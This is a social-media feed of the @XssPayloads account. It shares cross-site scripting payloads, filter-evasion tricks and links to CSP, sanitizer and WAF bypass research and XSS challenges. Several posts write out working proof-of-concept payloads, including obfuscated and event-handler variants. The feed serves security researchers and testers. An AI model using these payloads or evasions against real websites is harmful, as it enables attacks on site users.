XSS Payloads

@XssPayloads

Joined November 2014

0Following

51KFollowers

XSS Payloads@XssPayloads · Jul 25

A payload that hijacks the onsecuritypolicyviolation event, by Mikhail Khramenkov <input style=x type="hidden" onsecuritypolicyviolation="alert(1)">

110

5.0K

XSS Payloads@XssPayloads · Jul 25

GMSGadget (Give Me a Script Gadget) is a collection of JavaScript gadgets that can be used to bypass XSS mitigations such as Content Security Policy (CSP) and HTML sanitizers like DOMPurify. gmsgadget.com A useful tool by @kevin_mizu

5.0K

XSS Payloads@XssPayloads · Jul 21

A payload relying on obscure event handler for Safari and Trackpad click, by @stealthybugs " onwebkitmouseforcewillbegin="confirm(origin)"

4.0K

XSS Payloads@XssPayloads · Jul 20

Exploiting Self-XSS Using Disk Cache, an interesting technique by @mehdiparandin mey-d.github.io/posts/self-xss…

4.0K

XSS Payloads@XssPayloads · Jul 19

A WASM payload by @shahmidoe a.wasm: (module (func $f (import "m" "f")(param i32)) (func (export "a")(param i32) i32.const 64 call $f ) ) WebAssembly.instantiateStreaming(fetch('a.wasm'), {m:{f:alert}}).then(x=>{ x instance.exports.a(); });

2.0K

XSS Payloads@XssPayloads · Jul 18

WAFFLED: Exploiting Parsing Discrepancies to Bypass Web Application Firewalls Good research paper (and findings) by Seyed Ali Akhavani, Bahruz Jabiyev, Ben Kallus, Cem Topcuoglu, Sergey Bratus, and Engin Kirda. arxiv.org/pdf/2503.10846…

4.0K

XSS Payloads@XssPayloads · Jul 12

July XSS challenge by @intigriti challenge-0725.intigriti.io

XssPayloads's tweet card. Find the FLAG and WIN Intigriti swag.

4.0K

XSS Payloads@XssPayloads · Jul 11

Why XSS Persists in This Frameworks Era? an interesting analysis by @i_am_canalun flatt.tech/research/posts…

XssPayloads's tweet card. Introduction Hi, I’m canalun (@i_am_canalun ), a security researcher at GMO Flatt Security Inc. This article explores the question: “Why Does XSS Still Occur So Frequently?” We will delve into why...

4.0K

XSS Payloads@XssPayloads · Jul 3

Nonce CSP bypass using Disk Cache, good writeup by @J0R1AN jorianwoltjer.com/blog/p/researc…

XssPayloads's tweet card. The solution to my small XSS challenge, explaining a new kind of CSP bypass with browser-cached nonces. Leak it with CSS and learn about Disk Cache to safely update your payload

165

103

9.0K

XSS Payloads@XssPayloads · Jul 2

An XSS challenge by @J0R1AN greeting-chall.jorianwoltjer.com Source: gist.github.com/JorianWoltjer/…

XssPayloads's tweet card. https://greeting-chall.jorianwoltjer.com XSS challenge source code - greeting-chall.js

5.0K

XSS Payloads@XssPayloads · Jul 1

How we got persistent XSS on every AEM cloud site, thrice, good article by Adam Kues. slcyber.io/assetnote-secu…

XssPayloads's tweet card. Adobe Experience Manager is marketed as an 'enterprise grade' CMS and is one of the most popular CMSes among large companies. If you visit the landing page of a large corporate site, chances are it...

3.0K

XSS Payloads@XssPayloads · Jun 27

June XSS challenge by @intigriti challenge-0625.intigriti.io

3.0K

XSS Payloads@XssPayloads · Jun 27

3 filters evasion techniques by @therceman (function(x){this[x+`ert`](1)})`al` window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) document['default'+'View'][`\u0061lert`](3)

6.0K

XSS Payloads@XssPayloads · Jun 24

A cuneiform alphabet based payload by @viehgroup 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

206

112

15.0K

XSS Payloads@XssPayloads · Jun 20

June XSS challenge by @intigriti challenge-0625.intigriti.io

3.0K

XSS Payloads@XssPayloads · Jun 18

A payload for Chrome and Forefox by @garethheyes, found with Hacking Rooms: thespanner.co.uk/hacking-rooms <svg><title><![CDATA[--></title><img src onerror=alert(1)>]]>

XssPayloads's tweet card. I wanted to learn WebSockets, since I’d never done any development work with them before. I had this idea stuck in my head - using HackPad to test multiple browsers simultaneously - because constan...

3.0K